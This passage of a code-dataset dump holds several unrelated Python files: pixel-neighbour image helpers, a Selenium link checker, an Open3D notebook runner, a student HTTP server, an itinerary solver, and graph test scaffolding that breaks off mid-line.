pixel indexes as integer\r\ndef get_nbr_pixels(param_pixel, image_size, convert2xy=False, input_xy=False):\r\n\r\n # list for storing neighbor index numbers\r\n neighbors = []\r\n \r\n\r\n # assigning the positions for comparing neighbor pixels. starting with top going clockwise.\r\n ignore_neighbor_position_dict = { 'top' : False, 'top_right' : False, 'right' : False, 'bottom_right': False, 'bottom': False, 'bottom_left' : False, 'left': False, 'top_left': False }\r\n\r\n if input_xy is False:\r\n param_pixel = int( param_pixel )\r\n x = param_pixel % image_size[0]\r\n y = math.floor(param_pixel / image_size[0])\r\n\r\n elif input_xy is True:\r\n x = param_pixel[0]\r\n y = param_pixel[1]\r\n \r\n \r\n # determining if the current pixel is the leftmost pixel\r\n # no need to compare with top left, left, bottom left\r\n if x == 0:\r\n \r\n ignore_neighbor_position_dict['top_left'] = True\r\n ignore_neighbor_position_dict['left'] = True\r\n ignore_neighbor_position_dict['bottom_left'] = True\r\n \r\n # determing the first row\r\n # no need to compare with top left, top, top right\r\n if y == 0:\r\n ignore_neighbor_position_dict['top_left'] = True\r\n ignore_neighbor_position_dict['top'] = True\r\n ignore_neighbor_position_dict['top_right'] = True \r\n\r\n # determining the rightmost pixel. x counts from 0 to width - 1\r\n # no need to compare with top right, right, bottom right\r\n if x == image_size[0] - 1:\r\n ignore_neighbor_position_dict['top_right'] = True\r\n ignore_neighbor_position_dict['right'] = True\r\n ignore_neighbor_position_dict['bottom_right'] = True\r\n\r\n # determining last row . y counts from 0 to height - 1\r\n # no need to compare with bottom left, bottom, bottom right\r\n if y == image_size[1] - 1:\r\n ignore_neighbor_position_dict['bottom_left'] = True\r\n ignore_neighbor_position_dict['bottom'] = True\r\n ignore_neighbor_position_dict['bottom_right'] = True\r\n\r\n if ignore_neighbor_position_dict['top'] == False: \r\n if input_xy is False:\r\n top_neighbor = param_pixel - image_size[0]\r\n elif input_xy is True:\r\n top_neighbor = ( x, y - 1 )\r\n \r\n if convert2xy is False:\r\n neighbors.append(top_neighbor)\r\n else:\r\n xy = convert_pindex_to_xy( top_neighbor, image_size[0] )\r\n neighbors.append( xy )\r\n\r\n\r\n if ignore_neighbor_position_dict['top_right'] == False: \r\n if input_xy is False: \r\n top_right_neighbor = param_pixel - image_size[0] + 1\r\n elif input_xy is True:\r\n top_right_neighbor = ( x + 1, y - 1 )\r\n \r\n if convert2xy is False:\r\n neighbors.append(top_right_neighbor)\r\n else:\r\n xy = convert_pindex_to_xy( top_right_neighbor, image_size[0] )\r\n neighbors.append( xy )\r\n \r\n\r\n\r\n if ignore_neighbor_position_dict['right'] == False: \r\n if input_xy is False:\r\n right_neighbor = param_pixel + 1\r\n elif input_xy is True:\r\n right_neighbor = ( x + 1, y )\r\n \r\n if convert2xy is False:\r\n neighbors.append(right_neighbor)\r\n else:\r\n xy = convert_pindex_to_xy( right_neighbor, image_size[0] )\r\n neighbors.append( xy )\r\n \r\n\r\n if ignore_neighbor_position_dict['bottom_right'] == False:\r\n if input_xy is False:\r\n bottom_right_neighbor = param_pixel + image_size[0] + 1\r\n elif input_xy is True:\r\n bottom_right_neighbor = ( x + 1, y + 1 )\r\n \r\n if convert2xy is False:\r\n neighbors.append(bottom_right_neighbor)\r\n else:\r\n xy = convert_pindex_to_xy( bottom_right_neighbor, image_size[0] )\r\n neighbors.append( xy )\r\n \r\n\r\n if ignore_neighbor_position_dict['bottom'] == False:\r\n if input_xy is False:\r\n bottom_neighbor = param_pixel + image_size[0]\r\n elif input_xy is True:\r\n bottom_neighbor = ( x, y + 1 )\r\n \r\n if convert2xy is False:\r\n neighbors.append(bottom_neighbor)\r\n else:\r\n xy = convert_pindex_to_xy( bottom_neighbor, image_size[0] )\r\n neighbors.append( xy )\r\n\r\n\r\n if ignore_neighbor_position_dict['bottom_left'] == False: \r\n if input_xy is False: \r\n bottom_left_neighbor = param_pixel + image_size[0] - 1\r\n elif input_xy is True:\r\n bottom_left_neighbor = ( x - 1, y + 1 )\r\n \r\n if convert2xy is False:\r\n neighbors.append(bottom_left_neighbor)\r\n else:\r\n xy = convert_pindex_to_xy( bottom_left_neighbor, image_size[0] )\r\n neighbors.append( xy )\r\n\r\n if ignore_neighbor_position_dict['left'] == False:\r\n if input_xy is False: \r\n left_neighbor = param_pixel - 1\r\n elif input_xy is True:\r\n left_neighbor = ( x - 1, y )\r\n \r\n if convert2xy is False:\r\n neighbors.append(left_neighbor)\r\n else:\r\n xy = convert_pindex_to_xy( left_neighbor, image_size[0] )\r\n neighbors.append( xy )\r\n\r\n if ignore_neighbor_position_dict['top_left'] == False:\r\n if input_xy is False:\r\n top_left_neighbor = param_pixel - image_size[0] - 1\r\n elif input_xy is True:\r\n top_left_neighbor = ( x - 1, y - 1 )\r\n \r\n if convert2xy is False:\r\n neighbors.append(top_left_neighbor)\r\n else:\r\n xy = convert_pindex_to_xy( top_left_neighbor, image_size[0] )\r\n neighbors.append( xy ) \r\n\r\n return neighbors\r\n\r\n \r\n\r\n\r\n# input parameters\r\n# xy -> ( 190, 30 )\r\n# vicinity_value is how many pixels for the pixel to be expanded.\r\n# image_size -> image_size[0] is image width, image_size[1] is image height\r\ndef get_vicinity_pixels( xy, vicinity_value, image_size ):\r\n\r\n vicinity_pixels = [xy]\r\n \r\n for expanded_value in range( 1, vicinity_value + 1 ):\r\n # add if pixel is out of range of image size\r\n no_need2add = []\r\n \r\n upLeft = ( xy[0] - expanded_value , xy[1] - expanded_value )\r\n upRight = ( xy[0] + expanded_value , xy[1] - expanded_value )\r\n downRight = ( xy[0] + expanded_value , xy[1] + expanded_value )\r\n downLeft = ( xy[0] - expanded_value , xy[1] + expanded_value )\r\n\r\n if xy[1] - expanded_value < 0:\r\n no_need2add.append('up')\r\n if xy[0] + expanded_value >= image_size[0]:\r\n no_need2add.append('right')\r\n if xy[1] + expanded_value >= image_size[1]:\r\n no_need2add.append('down')\r\n if xy[0] - expanded_value < 0:\r\n no_need2add.append('left')\r\n \r\n if \"up\" not in no_need2add:\r\n # if up is in no_need2add, then no need to add any of the up pixels at all.\r\n for upL2upR in range( upLeft[0] + 1, upRight[0] ):\r\n # keep addng pixel to the right until upRight x.\r\n # as I move to the right, make sure that pixel is within the image width and expanded upLeft is within image width\r\n if upL2upR < image_size[0] and upL2upR >= 0:\r\n vicinity_pixels.append( ( upL2upR, upLeft[1] ) )\r\n \r\n if \"right\" not in no_need2add:\r\n # if right is in no_need2add, then there is no need to add any of the pixels between \"up right to down right\" at all.\r\n for upR2downR in range( upRight[1] + 1, downRight[1] ):\r\n # y + upR2downR.\r\n # as I move down, make sure that the pixel is still within the image height and upRight is within image height\r\n if upR2downR < image_size[1] and upR2downR >= 0:\r\n\r\n vicinity_pixels.append( ( upRight[0], upR2downR ) )\r\n \r\n if \"down\" not in no_need2add:\r\n for downL2downR in range( downLeft[0] + 1, downRight[0] ):\r\n # x + downL2downR\r\n if downL2downR < image_size[0] and downL2downR >= 0:\r\n vicinity_pixels.append( ( downL2downR, downLeft[1] ) )\r\n \r\n if \"left\" not in no_need2add:\r\n for upL2downL in range( upLeft[1] + 1, downLeft[1] ):\r\n # y + upL2downL\r\n if upL2downL < image_size[1] and upL2downL >= 0:\r\n vicinity_pixels.append( ( upLeft[0], upL2downL ) )\r\n\r\n \r\n return vicinity_pixels\r\n\r\n\r\n# pixel_xy -> ( x, y ) x and y are both integers\r\ndef get_pixel_im_area(pixel_xy, image_areas):\r\n # im_area -> one image area. example -> {1: {'left': 0, 'right': 71, 'top': 0, 'bottom': 40}}\r\n for im_area in image_areas:\r\n # im_area_lrtb -> image area's left right top bottom. {'left': 0, 'right': 71, 'top': 0, 'bottom': 40}\r\n for im_area_lrtb in im_area.values():\r\n # check if pixel's x position is between the current image area's left and right values\r\n if pixel_xy[0] >= im_area_lrtb[\"left\"] and pixel_xy[0] <= im_area_lrtb[\"right\"]:\r\n # check if pixel's y position is between the current image area's top and bottom values\r\n if pixel_xy[1] >= im_area_lrtb[\"top\"] and pixel_xy[1] <= im_area_lrtb[\"bottom\"]:\r\n \r\n return im_area\r\n\r\n \r\n print(\"ERROR at pixel_functions.get_pixel_im_area. pixel_xy has to be in one of the image areas\" )\r\n sys.exit()\r\n\r\n\r\n\r\n# xy -> ( x, y ) x and y are integers\r\n# return pixel_index. pixel_index is integer\r\ndef convert_xy_to_pindex( xy, im_width ):\r\n pixel_index = xy[1] * im_width + xy[0]\r\n \r\n return pixel_index\r\n\r\ndef convert_pindex_to_xy( pindex, im_width ):\r\n y = math.floor( int(pindex) / im_width)\r\n x = int(pindex) % im_width \r\n\r\n return ( x,y )\r\n\r\n\r\n\r\n\r\n# get pixels positions in pixel coordinate and not image coordinate\r\n#\r\n# pixels -> { (x,y), ... } or list of xy\r\n# \r\n# shapes_colors is the one returned by get_all_shapes_colors\r\n# \r\n# returns list of (x,y). [ ( x,y ), ... ]\r\n# x,y and r,g,b are all integers\r\ndef get_pixels_pos_in_pix_coord( pixels ): \r\n \r\n smallest_x = min( [ xy[0] for xy in pixels ] )\r\n smallest_y = min( [ xy[1] for xy in pixels ] )\r\n\r\n pixel_coords = [ (xy[0] - smallest_x, xy[1] - smallest_y ) for xy in pixels ]\r\n\r\n return pixel_coords\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"libraries/pixel_functions.py","file_name":"pixel_functions.py","file_ext":"py","file_size_in_byte":13503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"394043869","text":"from selenium import webdriver\nimport os\nimport requests\n\n\ndef test_links(links):\n for link in links:\n request = requests.get(link)\n if request.status_code != 200:\n print('Found bad URL: ' + link)\n print('Code: ' + str(request.status_code))\n return\n print('No broken URLs!')\n\n\ndef test_dewey():\n root_dir = os.getcwd()\n utils_dir = os.path.abspath(root_dir + \"/../utils/\")\n driver = webdriver.Chrome(executable_path=utils_dir + '/chromedriver')\n\n driver.get(\"https://kyledewey.github.io/\")\n links_elements = driver.find_elements_by_tag_name('a')\n\n links = list(map(lambda e: e.get_attribute('href'), links_elements))\n\n test_links(links)\n\n driver.quit()\n\n\nif __name__ == '__main__':\n test_dewey()\n","sub_path":"src/test_prof_dewey.py","file_name":"test_prof_dewey.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"481016384","text":"# ----------------------------------------------------------------------------\n# - Open3D: www.open3d.org -\n# ----------------------------------------------------------------------------\n# The MIT License (MIT)\n#\n# Copyright (c) 2018-2021 www.open3d.org\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n# IN THE SOFTWARE.\n# ----------------------------------------------------------------------------\n\nimport nbformat\nimport nbconvert\nfrom pathlib import Path\nimport os\nimport argparse\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--write\", action='store_true')\n parser.add_argument(\"--break_on_failure\", action='store_true')\n args = parser.parse_args()\n\n # Setting os.environ[\"CI\"] will disable interactive (blocking) mode in\n # Jupyter notebooks\n os.environ[\"CI\"] = \"true\"\n\n file_dir = Path(__file__).absolute().parent\n\n # Note: must be consistent with make_docs.py\n example_dirs = [\n \"geometry\",\n \"core\",\n \"pipelines\",\n \"visualization\",\n ]\n nb_paths = []\n for example_dir in example_dirs:\n nb_paths += sorted((file_dir / example_dir).glob(\"*.ipynb\"))\n\n print(\"Found the following notebooks:\")\n for nb_path in nb_paths:\n print(\"> {}\".format(nb_path))\n\n for nb_path in nb_paths:\n print(\"[Executing notebook {}]\".format(nb_path.name))\n\n with open(nb_path) as f:\n nb = nbformat.read(f, as_version=4)\n ep = nbconvert.preprocessors.ExecutePreprocessor(timeout=6000)\n try:\n ep.preprocess(nb, {\"metadata\": {\"path\": nb_path.parent}})\n except nbconvert.preprocessors.execute.CellExecutionError as e:\n print(\"Execution of {} failed\".format(nb_path.name))\n if args.break_on_failure:\n raise\n\n if args.write:\n print(\"Writing the executed notebook\")\n with open(nb_path, \"w\", encoding=\"utf-8\") as f:\n nbformat.write(nb, f)\n","sub_path":"docs/jupyter/jupyter_run_all.py","file_name":"jupyter_run_all.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"226998607","text":"def solution(tickets: 'List[List[str]]') -> 'List[str]':\n answer = []\n tickets.sort(key=lambda x: x[1], reverse=True)\n route = {}\n for src, dst in tickets:\n nexts = route.setdefault(src, [])\n nexts.append(dst)\n\n def visit(airport):\n while route.get(airport):\n visit(route[airport].pop())\n answer.append(airport)\n visit('ICN')\n return answer[::-1]\n\n\nif __name__ == '__main__':\n tickets = [['ICN', 'JFK'], ['HND', 'IAD'], ['JFK', 'HND']]\n r = solution(tickets)\n print(r)\n tickets = [['ICN', 'SFO'], ['ICN', 'ATL'],\n ['SFO', 'ATL'], ['ATL', 'ICN'], ['ATL', 'SFO']]\n r = solution(tickets)\n print(r)\n","sub_path":"programmers/43164.py","file_name":"43164.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"589970155","text":"#!/usr/bin/env python3\n# See https://docs.python.org/3.2/library/socket.html\n# for a description of python socket and its parameters\n\n#usage: python3 cuixx327_server.py\n#use python instead of python3 may cause error\n#If some special port is needed: python3 cuixx327_server.py -p portnumber\n#I have tried to modify the \"GET\" method so it can deal with binary files, in this code, you can test it by http://localhost:9001/test.jpg (I have hard code the html response so it can only correctly display with .jpg here, just a sample shows that this server can send binary data).\n#As this server actually accept \".jpg\" and \".html\", requests with other file types will get a response \"406 NOT ACCEPTABLE\"\n\n#Also, for OPTION, if a \"form.html\" doesn't exist, it can't be \"GET\" or \"POST\" or something, only if it exists, the OPTION function will give these methods.\n#Only when the folder has 666 or above permission, DELETE and PUT can be done, which means you may need to change the mode of the folder to test these functions, a default folder does not have these permissions.\n\n\n\n\nimport socket\nimport string\nimport os.path\nimport stat\nimport os\nimport urllib.parse\nimport datetime\nimport base64\n\nfrom threading import Thread\nfrom argparse import ArgumentParser\n\nBUFSIZE = 4096\n\nCRLF = '\\r\\n'\nMETHOD_NOT_ALLOWED = 'HTTP/1.1 405 METHOD NOT ALLOWED{}Allow: GET, HEAD{}{}{}'.format(CRLF, CRLF, CRLF, CRLF)\nOK = 'HTTP/1.1 200 OK{}Connection: close{}{}'.format(CRLF, CRLF, CRLF)\nOKCLOSE = 'HTTP/1.1 200 OK{}{}{}'.format(CRLF, CRLF, CRLF)\n\nCREATED = 'HTTP/1.1 201 CREATED{}{}{}'.format(CRLF, CRLF, CRLF)\nNOT_ACCEPTABLE = 'HTTP/1.1 406 NOT ACCEPTABLE ERROR{}{}{}'.format(CRLF, CRLF, CRLF)\nNOT_ALLOWED = 'HTTP/1.1 405 METHOD NOT ALLOWED{}ALLOW: GET, POST, POST, PUT, DELETE, OPTIONS{}Connection: close{}'.format(CRLF, CRLF, CRLF)\nNOT_FOUND = 'HTTP/1.1 404 NOT FOUND{}Connection: close{}{}'.format(CRLF, CRLF, CRLF)\nFORBIDDEN = 'HTTP/1.1 403 FORBIDDEN{}Connection: close{}{}'.format(CRLF, CRLF, CRLF)\nBAD_REQ = 'HTTP/1.1 400 BAD REQUEST{}{}{}'.format(CRLF, CRLF, CRLF)\nMOVED_PERMANENTLY = 'HTTP/1.1 301 MOVED PERMANENTLY{}Location: https://www.cs.umn.edu/{}Connection: close{}{}'.format(CRLF, CRLF, CRLF, CRLF)\n\n\ndef get_contents(fname):\n with open(fname, 'r') as f:\n return f.read()\n\n\ndef check_perms(resource):\n \"\"\"Returns True if resource has read permissions set on 'others'\"\"\"\n stmode = os.stat(resource).st_mode\n return (getattr(stat, 'S_IROTH') & stmode) > 0\n\ndef client_talk(client_sock, client_addr):\n print('Server is talking to {}'.format(client_addr))\n recvData = client_sock.recv(BUFSIZE)\n while recvData:\n data = recvData.decode('utf-8')\n print('The request is \\r\\n{}\\r\\n' .format(data))\n dataLined = data.splitlines()\n #print('the first line is [{}]' .format(dataLined[0]))\n request = dataLined[0].split()\n put_content = dataLined[len(dataLined)-1]\n print (\"content is:\")\n print (put_content)\n if len(request) == 3:\n if request[0] == \"GET\":\n sendmsg = requestGet(request)\n elif request[0] == \"HEAD\":\n sendmsg = requestHead(request)\n elif request[0] == \"POST\":\n sendmsg = requestPost(request[2],dataLined[len(dataLined)-1])\n elif request[0] == \"PUT\":\n sendmsg = requestPut(request,put_content)\n elif request[0] == \"DELETE\":\n sendmsg = requestDelete(request)\n elif request[0] == \"OPTIONS\":\n sendmsg = requestOptions(request)\n elif request[0] == \"HEAD\":\n sendmsg = requestHead(request)\n else:\n sendmsg = NOT_ALLOWED\n else:\n sendmsg = ''.join([NOT_ALLOWED,\"<html><head><title>405 METHOD NOT ALLOWED\\\n

405 METHOD NOT ALLOWED


\"])\n print('Response:\\n {}' .format(sendmsg))\n client_sock.send(bytes(sendmsg, 'utf-8'))\n recvData = client_sock.recv(BUFSIZE)\n\n # clean up\n client_sock.shutdown(1)\n client_sock.close()\n print('connection closed.')\n\ndef requestPut(request,put_content):\n #print (filename)\n print (\"Request is:\")\n print (request)\n #print (os.path.exists(filename[1]))\n filename = request[1].split(\"/\")\n print (len(filename))\n cwd = os.getcwd()\n filenamewithpath = cwd \n for i in range (1,len(filename)):\n filenamewithpath = ''.join([filenamewithpath,'/'])\n filenamewithpath = ''.join([filenamewithpath,filename[i]])\n\n print(filenamewithpath)\n\n if (len(filename)>=2):\n getfolderpermission = cwd\n for i in range (1,len(filename)-1):\n getfolderpermission = ''.join([getfolderpermission,'/'])\n getfolderpermission = ''.join([getfolderpermission,filename[i]])\n print(getfolderpermission)\n\n\n if (bool(os.stat(getfolderpermission).st_mode & stat.S_IWOTH) and bool(os.stat(getfolderpermission).st_mode & stat.S_IROTH)):\n if(filename[len(filename)-1] == \"csumn\"):\n msg = MOVED_PERMANENTLY\n elif not bool(os.path.exists(filenamewithpath)):\n f = open(filenamewithpath,'w')\n fstr = f.write(put_content)\n f.close()\n contentmsg = ''.join(['Content-Location:', filenamewithpath])\n Createmsg = 'HTTP/1.1 201 CREATED{}{}{}Connection: close'.format(CRLF, contentmsg, CRLF)\n msg = Createmsg\n elif not bool(os.stat(filenamewithpath).st_mode & stat.S_IROTH):\n f = open('403.html','r')\n fstr = f.read()\n f.close()\n msg = FORBIDDEN\n else:\n f = open(filenamewithpath,'w')\n fstr = f.write(put_content)\n f.close()\n contentmsg = ''.join(['Content-Location:', filenamewithpath])\n OKmsg = 'HTTP/1.1 200 OK{}{}{}Connection: close'.format(CRLF, contentmsg, CRLF)\n msg = OKmsg\n else:\n f = open('403.html','r')\n fstr = f.read()\n f.close()\n msg = FORBIDDEN\n return msg\n\n\ndef requestOptions(request):\n\n currenttime = datetime.datetime.now()\n currenttime = ''.join([\"Date:\",str(currenttime)])\n\n filename = request[1].split(\"/\")\n print (len(filename))\n cwd = os.getcwd()\n filenamewithpath = cwd \n for i in range (1,len(filename)):\n filenamewithpath = ''.join([filenamewithpath,'/'])\n filenamewithpath = ''.join([filenamewithpath,filename[i]])\n contentlength = len(filename[1])\n #print(filenamewithpath)\n\n #print (os.path.exists(filename[1]))\n if filename[1] == \"\" :\n AllowList = \"Allow: GET POST PUT DELETE OPTION\" \n\n\n elif(filename[len(filename)-1] == \"csumn\"):\n msg = MOVED_PERMANENTLY\n\n elif not bool(os.path.exists(filenamewithpath)):\n AllowList = \"Allow: PUT OPTION(404 Not Found)\" \n\n elif not bool(os.stat(filenamewithpath).st_mode & stat.S_IROTH):\n AllowList = \"Allow: OPTION (403 Forbidden)\"\n\n elif (request[1].split(\".\")[1] == \"jpg\"):\n AllowList = \"Allow: GET OPTION\"\n\n elif (request[1].split(\".\")[0] == \"/calender\"):\n AllowList = \"Allow: GET OPTION DELETE\"\n\n elif (request[1].split(\".\")[0] == \"/place\"):\n AllowList = \"Allow: GET OPTION DELETE\"\n\n elif (request[1].split(\".\")[0] == \"/form\"):\n AllowList = \"Allow: GET OPTION DELETE POST\"\n\n else:\n AllowList = \"Allow: OPTION DELETE\"\n msg = 'HTTP/1.1 200 OK{}{}{}{}{}{}{}{}{}'.format(CRLF,AllowList, CRLF, \"Cache-Control: max-age=604800\",CRLF,currenttime,CRLF,\"Content-Length: \",contentlength)\n return msg\n\n\ndef requestDelete(request):\n currenttime = datetime.datetime.now()\n currenttime = ''.join([\"Date:\",str(currenttime)])\n filename = request[1].split(\"/\")\n print (len(filename))\n cwd = os.getcwd()\n filenamewithpath = cwd \n for i in range (1,len(filename)):\n filenamewithpath = ''.join([filenamewithpath,'/'])\n filenamewithpath = ''.join([filenamewithpath,filename[i]])\n\n print(filenamewithpath)\n\n if (len(filename)>=2):\n getfolderpermission = cwd\n for i in range (1,len(filename)-1):\n getfolderpermission = ''.join([getfolderpermission,'/'])\n getfolderpermission = ''.join([getfolderpermission,filename[i]])\n print(getfolderpermission)\n\n if (bool(os.stat(getfolderpermission).st_mode & stat.S_IWOTH) and bool(os.stat(getfolderpermission).st_mode & stat.S_IROTH)):\n #print (\"folder permission\")\n #print (filename)\n #print (os.path.exists(filename[1]))\n if(filename[len(filename)-1] == \"csumn\"):\n msg = MOVED_PERMANENTLY\n elif not bool(os.path.exists(filenamewithpath)):\n msg = NOT_FOUND\n elif not bool(os.stat(filenamewithpath).st_mode & stat.S_IROTH):\n f = open('403.html','r')\n fstr = f.read()\n f.close()\n msg = ''.join([FORBIDDEN,fstr])\n elif not (request[1].split(\".\")[1] == \"html\"):\n msg = ''.join([NOT_ACCEPTABLE,\"406 NOT ACCEPTABLE\\\n

406 NOT ACCEPTABLE


\"])\n else:\n #print(\"delete\")\n os.remove(filenamewithpath)\n OKmsg = 'HTTP/1.1 200 OK{}{}{}Connection: close'.format(CRLF, currenttime, CRLF)\n msg = OKmsg\n else:\n f = open('403.html','r')\n fstr = f.read()\n f.close()\n msg = ''.join([FORBIDDEN,fstr])\n return msg\n \n\ndef requestGet(request):\n\n filename = request[1].split(\"/\")\n print (len(filename))\n cwd = os.getcwd()\n filenamewithpath = cwd \n for i in range (1,len(filename)):\n filenamewithpath = ''.join([filenamewithpath,'/'])\n filenamewithpath = ''.join([filenamewithpath,filename[i]])\n\n print(filenamewithpath)\n \n\n\n\n #print (os.path.exists(filename[1]))\n if(filename[len(filename)-1] == \"csumn\"):\n msg = MOVED_PERMANENTLY\n elif not(os.path.exists(filenamewithpath)):\n f = open('404.html','r')\n fstr = f.read()\n f.close()\n msg = ''.join([NOT_FOUND,fstr])\n #check for 403 error: check permission\n elif not bool(os.stat(filenamewithpath).st_mode & stat.S_IROTH):\n f = open('403.html','r')\n fstr = f.read()\n f.close()\n msg = ''.join([FORBIDDEN,fstr])\n elif (request[1].split(\".\")[1] == \"jpg\"):\n f = open(filenamewithpath,'rb').read()\n print(type(f))\n f64 = base64.b64encode(f)\n fformat = str(f64,'utf-8')\n fstr = '''\n \n Binary Picture\n \n

Picture Test

\n \n \n \n '''.format(fformat)\n msg = ''.join([OK,fstr])\n elif not(filenamewithpath.split(\".\")[1] == \"html\"):\n msg = ''.join([NOT_ACCEPTABLE,\"406 NOT ACCEPTABLE\\\n

406 NOT ACCEPTABLE


\"])\n else:\n f = open(filenamewithpath,'r')\n fstr = f.read()\n f.close()\n msg = ''.join([OK,fstr])\n return msg\n\ndef requestPost(protocal,request):\n print (request)\n postSplit = request.split(\"=\")\n placeNameSplit = postSplit[1].split(\"&\")\n placeName = placeNameSplit[0].replace(\"+\",\" \")\n Line1Split = postSplit[2].split(\"&\")\n Line1 = Line1Split[0].replace(\"+\",\" \")\n Line2Split = postSplit[3].split(\"&\")\n Line2 = Line2Split[0].replace(\"+\",\" \")\n openTimeSplit = postSplit[4].split(\"&\")\n openTime = ''.join([openTimeSplit[0].split(\"%\")[0],\":\",openTimeSplit[0].split(\"A\")[1]])\n closeTimeSplit = postSplit[5].split(\"&\")\n closeTime = ''.join([closeTimeSplit[0].split(\"%\")[0],\":\",closeTimeSplit[0].split(\"A\")[1]])\n AddSplit = postSplit[6].split(\"&\")\n Add = AddSplit[0].replace(\"+\",\" \")\n #URL = postSplit[7]\n #print('Posted information: event:{}\\nstart:{}\\nend:{}\\nlocation:{}\\nday:{}\\n' .format(eventName,startTime,endTime,location,day))\n submitTable = ''.join([\" Submit information\\\n

Following Form Data Submitted Successfully:

\\\n \\\n \\\n
Place name:\",placeName,\"
Address Line 1:\",Line1,\"
Address Line 2:\",Line2,\"
Open Time:\",openTime,\"
Close Time:\",closeTime,\"
Additional Information:\",Add,\"
\"])\n msg = ''.join([protocal,\" 200 OK\\r\\n\\r\\n\",submitTable])\n return msg\n\ndef requestHead(request):\n filename = request[1].split(\"/\")\n print (len(filename))\n cwd = os.getcwd()\n filenamewithpath = cwd \n for i in range (1,len(filename)):\n filenamewithpath = ''.join([filenamewithpath,'/'])\n filenamewithpath = ''.join([filenamewithpath,filename[i]])\n\n print(filenamewithpath)\n if(filename[len(filename)-1] == \"csumn\"):\n msg = ''.join([\"HTTP/1.1\" ,\" 301 MOVED PERMANENTLY\\r\\n\\r\\n\"])\n elif not(os.path.exists(filenamewithpath)):\n msg = ''.join([\"HTTP/1.1\",\" 404 NOT FOUND\\r\\n\\r\\n\"])\n elif not bool(os.stat(filenamewithpath).st_mode & stat.S_IROTH):\n msg = ''.join([\"HTTP/1.1\" ,\" 403 FORBIDDEN\\r\\n\\r\\n\"])\n elif not (filenamewithpath.split(\".\")[1] == \"html\"):\n msg = ''.join([\"HTTP/1.1\" ,\" 406 NOT ACCEPTABLE\\r\\n\\r\\n\"])\n else:\n msg = ''.join([\"HTTP/1.1\" ,\" 200 OK\\r\\n\\r\\n\\r\\n\"])\n return msg\n\n\nclass EchoServer:\n def __init__(self, host, port):\n print('listening on port {}'.format(port))\n self.host = host\n self.port = port\n\n self.setup_socket()\n\n self.accept()\n\n self.sock.shutdown()\n self.sock.close()\n\n def setup_socket(self):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock.bind((self.host, self.port))\n self.sock.listen(128)\n\n def accept(self):\n while True:\n (client, address) = self.sock.accept()\n print(self)\n th = Thread(target=client_talk, args=(client, address))\n th.start()\n\n\ndef parse_args():\n parser = ArgumentParser()\n parser.add_argument('--host', type=str, default='localhost',\n help='specify a host to operate on (default: localhost)')\n parser.add_argument('-p', '--port', type=int, default=9001,\n help='specify a port to operate on (default: 9001)')\n args = parser.parse_args()\n return (args.host, args.port)\n\n\nif __name__ == '__main__':\n (host, port) = parse_args()\n EchoServer(host, port)\n","sub_path":"python-server/cuixx327_server.py","file_name":"cuixx327_server.py","file_ext":"py","file_size_in_byte":14568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"114922028","text":"\"\"\"Standardized tests for Graph data structure.\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport random\nimport string\nimport pytest\nfrom itertools import chain, permutations\nfrom collections import namedtuple\n\nMODULENAME = 'graph'\nCLASSNAME = 'Graph'\n\nmodule = import_module(MODULENAME)\nClassDef = getattr(module, CLASSNAME)\n\nREQ_METHODS = [\n 'nodes',\n 'edges',\n 'add_node',\n 'add_edge',\n 'del_node',\n 'del_edge',\n 'has_node',\n 'neighbors',\n 'adjacent',\n]\n\nGraphFixture = namedtuple(\n 'GraphFixture', (\n 'instance',\n 'nodes',\n 'edges',\n 'node_to_delete',\n 'edge_to_delete',\n 'not_edges',\n )\n)\n\n\ndef _make_node_edge_combos(nodes):\n \"\"\"Generate different combinations of edges for the given nodes.\"\"\"\n nodes = set(nodes)\n all_possible = set(permutations(nodes, 2))\n max_edges = len(all_possible)\n\n yield nodes, set() # No edges\n if all_possible:\n yield nodes, all_possible # All possible edges\n for _ in range(min(max_edges, 10)):\n edge_count = random.randrange(1, max_edges)\n edges = random.sample(all_possible, edge_count)\n yield nodes, set(edges)\n\n\ndef _make_graph_dict(nodes, edges):\n \"\"\"Make a dict representing the graph.\"\"\"\n dict_ = {}\n for node in nodes:\n dict_[node] = set(edge[1] for edge in edges if edge[0] == node)\n return dict_\n\n\nEDGE_CASES = [\n (),\n (0,),\n (0, 1),\n (1, 0),\n '',\n 'a',\n 'ab',\n 'ba',\n]\n\n# lists of ints\nINT_TEST_CASES = (random.sample(range(1000),\n random.randrange(2, 20)) for n in range(10))\n\n# strings\nSTR_TEST_CASES = (random.sample(string.printable,\n random.randrange(2, 20)) for n in range(10))\n\nTEST_CASES = chain(EDGE_CASES, INT_TEST_CASES, STR_TEST_CASES)\n\nTEST_CASES 